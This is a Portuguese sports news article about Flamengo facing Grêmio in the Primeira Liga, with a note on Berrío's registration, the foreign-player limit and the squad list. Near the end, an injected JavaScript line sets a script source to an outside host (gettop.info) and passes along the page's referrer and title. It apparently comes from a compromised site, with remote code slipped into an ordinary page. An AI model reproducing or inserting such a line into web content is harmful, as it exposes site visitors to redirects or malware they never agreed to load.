Fla encara o Grêmio no Mané Garrincha, amanhã, pela Primeira Liga

Berrío, Rômulo e Arão foram relacionados para pegar o Grêmio. Foto: Gilvan de Souza/Flamengo

O Flamengo estreia na Primeira Liga, nesta quarta-feira, às 19h30, contra o Grêmio, no estádio Mané Garrincha, e a novidade para é Orlando Enrique Berrío Melendez. Regularizado, o nome do colombiano, que veio do Atlético Nacional, apareceu no BID (Boletim Informativo Diário) da CBF nesta terça (7).

Com a normalização do nome do atacante, outro estrangeiro acabou perdendo espaço na equipe: por conta de o regulamento nacional só permitir cinco estrangeiros por jogo, Donatti não foi relacionado. Vindo do Rosario Central, da Argentina, no ano passado, o zagueiro não teve muitas oportunidades e viu a dupla Réver/Rafael Vaz fazer boa temporada em 2016.

Para o jogo contra o Grêmio, na competição nacional, os peruanos Trauco e Guerrero, o argentino Mancuello e os colombianos Cuéllar e Berrío compõem o grupo de gringos que participarão da estreia. 

Confira a lista de relacionados:

Goleiros: Alex Muralha, Thiago e Gabriel;

Laterais: Pará, Rodinei, Trauco;

Zagueiros: Rafael Vaz, Réver, Juan e Léo Duarte;

Meias: Rômulo, William Arão, Márcio Araújo, Cuéllar, Diego, Mancuello, Everton, Gabriel, Adryan;

Atacantes: Guerrero, Leandro Damião, Berrío e Marcelo Cirino.

Já o Grêmio entrará com a equipe reserva e será comandado pelo auxiliar Alexandre Mendes, já que o técnico Renato Gaúcho preferiu ficar em Porto Alegre.

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário